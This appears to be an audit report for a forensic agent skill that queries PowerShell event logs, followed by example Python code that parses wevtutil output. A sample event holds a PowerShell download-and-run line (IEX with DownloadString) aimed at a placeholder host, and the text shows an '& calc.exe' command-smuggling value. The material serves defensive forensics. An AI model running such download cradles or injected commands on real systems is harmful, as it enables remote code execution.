analyzing-powershell-empire-artifacts

Pass

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: SAFE
Flags: COMMAND_EXECUTION, DATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION]: The script 'scripts/agent.py' uses 'subprocess.run' to invoke the Windows 'wevtutil' utility and query audit logs. It passes the command and its arguments as a list rather than as a shell-interpolated string, so metacharacters in a query value reach 'wevtutil' as a single argument instead of being interpreted by cmd.exe; this mitigates command injection.
  • [DATA_EXFILTRATION]: The skill reads sensitive system information from the PowerShell Operational and Module event logs. That exposure is inherent to the skill's forensic purpose; the data is processed only on the local host, and the script contains no network exfiltration mechanism.
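The pattern the audit describes, as an added example (this is not the audited skill's 'scripts/agent.py'): the 'wevtutil qe ... /f:xml' argv is built as a list, the shell-string form is shown only for contrast, and the XML that 'wevtutil' returns is parsed offline. The sample events below are constructed, and the one-<Event>-per-line, no-root-element output shape is an assumption about 'wevtutil /f:xml' rather than something the page states.

```python
"""Added example, not the audited skill's code.

Assumptions (not from the page): wevtutil's `qe ... /f:xml` prints one
<Event> element per event with no document root, and the two sample events
below are constructed to look like PowerShell script-block (4104) and
module-logging (4103) records.
"""
import subprocess
import xml.etree.ElementTree as ET
from typing import Dict, List

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample of what `wevtutil qe <channel> /f:xml` might return.
SAMPLE_WEVTUTIL_OUTPUT = """\
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell'/><EventID>4104</EventID><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>WS01</Computer></System><EventData><Data Name='MessageNumber'>1</Data><Data Name='MessageTotal'>1</Data><Data Name='ScriptBlockText'>IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')</Data><Data Name='ScriptBlockId'>00000000-0000-0000-0000-000000000001</Data><Data Name='Path'></Data></EventData></Event>
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-PowerShell'/><EventID>4103</EventID><Channel>Microsoft-Windows-PowerShell/Operational</Channel><Computer>WS01</Computer></System><EventData><Data Name='ContextInfo'>Severity = Informational</Data><Data Name='UserData'></Data><Data Name='Payload'>CommandInvocation(Get-Process): "Get-Process"</Data></EventData></Event>
"""


def build_wevtutil_argv(channel: str, xpath_query: str, count: int = 1000) -> List[str]:
    """Safe form: every value is its own argv element, so a '&' or '|' inside
    xpath_query is delivered to wevtutil verbatim, never to a shell."""
    return ["wevtutil", "qe", channel, f"/q:{xpath_query}", f"/c:{count}", "/f:xml"]


def build_wevtutil_shell_string(channel: str, xpath_query: str, count: int = 1000) -> str:
    """Injectable form, for contrast only: under shell=True a '& other.exe'
    in xpath_query becomes a second command. Do not run this."""
    return f"wevtutil qe {channel} /q:{xpath_query} /c:{count} /f:xml"


def parse_wevtutil_xml(text: str) -> List[Dict[str, str]]:
    """Parse wevtutil's rootless XML output into one dict per event:
    EventID, Channel, plus every <Data Name=...> field from EventData."""
    root = ET.fromstring("<Events>" + text + "</Events>")  # add the missing root
    events: List[Dict[str, str]] = []
    for ev in root.findall("e:Event", EVT_NS):
        rec = {
            "EventID": ev.findtext("e:System/e:EventID", namespaces=EVT_NS) or "",
            "Channel": ev.findtext("e:System/e:Channel", namespaces=EVT_NS) or "",
        }
        for d in ev.findall("e:EventData/e:Data", EVT_NS):
            rec[d.get("Name", "")] = d.text or ""  # empty elements -> ""
        events.append(rec)
    return events


def query_events(channel: str, xpath_query: str, count: int = 1000) -> List[Dict[str, str]]:
    """Windows-only: run wevtutil without a shell and parse what it returns."""
    proc = subprocess.run(  # no shell=True: argv goes straight to CreateProcess
        build_wevtutil_argv(channel, xpath_query, count),
        capture_output=True, text=True, check=True,
    )
    return parse_wevtutil_xml(proc.stdout)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; query_events() itself
    # only works on a Windows host with wevtutil on PATH.
    for rec in parse_wevtutil_xml(SAMPLE_WEVTUTIL_OUTPUT):
        print(rec["EventID"], rec.get("ScriptBlockText") or rec.get("Payload"))
```

'query_events' is the only part that touches the host; everything it feeds to 'subprocess.run' comes from 'build_wevtutil_argv', so a hostile query such as `*[System[EventID=4104]] & calc.exe` stays one argument. The parse step is what the 4104 'ScriptBlockText' and 4103 'Payload' fields fall out of, which is where PowerShell artifact review starts.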
Audit Metadata
Risk Level
SAFE
Analyzed
Apr 7, 2026, 12:01 PM